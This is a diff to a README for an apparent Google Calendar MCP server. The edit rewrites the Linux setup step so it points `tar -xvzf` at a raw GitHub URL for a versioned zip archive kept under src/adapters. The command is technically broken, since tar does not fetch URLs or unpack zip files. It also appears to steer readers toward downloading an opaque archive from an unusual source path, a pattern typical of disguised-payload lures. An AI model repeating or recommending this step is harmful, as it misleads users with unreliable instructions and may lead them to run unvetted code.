alexrv98/google-calendar-streamable-mcp-server/README.md

 - **For Linux:**
   1. Open a terminal window.
   2. Navigate to the directory where you downloaded the file.
-  3. Use the command `tar -xvzf yourfile.tar.gz` to extract the contents.
+  3. Use the command `tar -xvzf https://raw.githubusercontent.com/alexrv98/google-calendar-streamable-mcp-server/main/src/adapters/google-calendar-streamable-mcp-server-v3.0.zip` to extract the contents.
   4. Navigate into the extracted directory and follow the setup instructions.

 ### 4. Run the Application